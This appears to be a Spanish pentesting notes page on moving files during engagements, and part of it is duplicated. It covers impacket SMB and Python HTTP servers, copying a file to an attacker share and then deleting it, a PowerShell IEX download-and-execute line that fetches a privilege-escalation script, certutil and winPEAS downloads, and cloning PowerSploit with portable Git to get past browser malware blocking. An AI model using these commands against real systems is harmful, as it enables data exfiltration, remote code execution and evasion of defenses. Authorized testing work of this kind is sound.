Transferencia de ficheros
Servidores temporales
SMB
Se busca el binario de impacket-smbserver:
> locate smbserver
/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.pySe ejecuta una carpeta compartida vía SMB:
sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtorminSe monta la carpeta vía CMD/Powershell:
net use z: \\192.168.1.100\share /user:xtormin xtorminSe accede a la carpeta compartida y se descargan los ficheros que se quieran:
net use \\<IP de Kali>\share /u:xtormin xtormin
copy file.zip \\<IP de Kali>\share\
del file.zip
net use /d \\<IP de Kali>\shareHTTP
HFS
Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.
Python
python3 -m http.server 8000Descarga de ficheros
Servidores temporales
SMB
Se busca el binario de impacket-smbserver:
> locate smbserver
/usr/bin/impacket-smbserver
/usr/lib/python3/dist-packages/impacket/smbserver.py
/usr/lib/python3/dist-packages/impacket/__pycache__/smbserver.cpython-310.pyc
/usr/share/doc/python3-impacket/examples/smbserver.pySe sirve una carpeta compartida vía SMB:
sharedfolder=/tmp/tempserver
mkdir $sharedfolder
cd $sharedfolder
impacket-smbserver share . -smb2support -username xtormin -password xtorminSe monta la carpeta vía CMD/Powershell:
net use z: \\192.168.1.100\share /user:xtormin xtorminSe accede a la carpeta compartida y se descargan los ficheros que se quieran:
net use \\<IP de Kali>\share /u:xtormin xtormin
copy file.zip \\<IP de Kali>\share\
del file.zip
net use /d \\<IP de Kali>\shareHTTP
HFS
Se ejecuta el binario hfs.exe descargado desde la interfaz gráfica y se añaden los ficheros que se deseen exponer en el servidor web.
Python
python3 -m http.server 8000Descarga y subida de ficheros
Linux
wget "https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1"Windows
iwr https://192.168.1.110/winPEASx64.exe -outputfile winpeas64.exe
IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:8000/Azure-ADConnect.ps1')
.\certutil.exe -urlcache -split -f "http://legacy.ps1"Consideraciones
SSH
Descarga desde servidor remoto a local:
USER='xtormin'
IP='192.168.1.100'
RUTASRV='C:/Users/xtormin/Documents/<archivo_zip>.zip'
RUTALOCAL='.'
scp $USER@$IP:$RUTASRV $RUTALOCALSubida desde local a servidor remoto:
USER='xtormin'
IP='192.168.1.100'
RUTASRV='C:/Users/xtormin/Documents/<archivo_zip>.zip'
RUTALOCAL='.'
scp $RUTALOCAL $USER@$IP:$RUTASRVGit - Descarga de repositorios
En ocasiones, el navegador puede bloquear la descarga de ficheros que identifica como maliciosos. Una forma de descargarlos cuando es usando Git con su versión portable cuando no se pueda instalar o no se cuente con permisos de administrador local.
Git
https://git-scm.com/download/win/
cd PortableGit-2.46.2-64-bit
.\git-bash.exeEsto abrirá una consola desde la que se podrá clonar el repositorio:
cd c/Pentest/Tools
git clone https://github.com/PowerShellMafia/PowerSploit.gitReferencias
Última actualización
¿Te fue útil?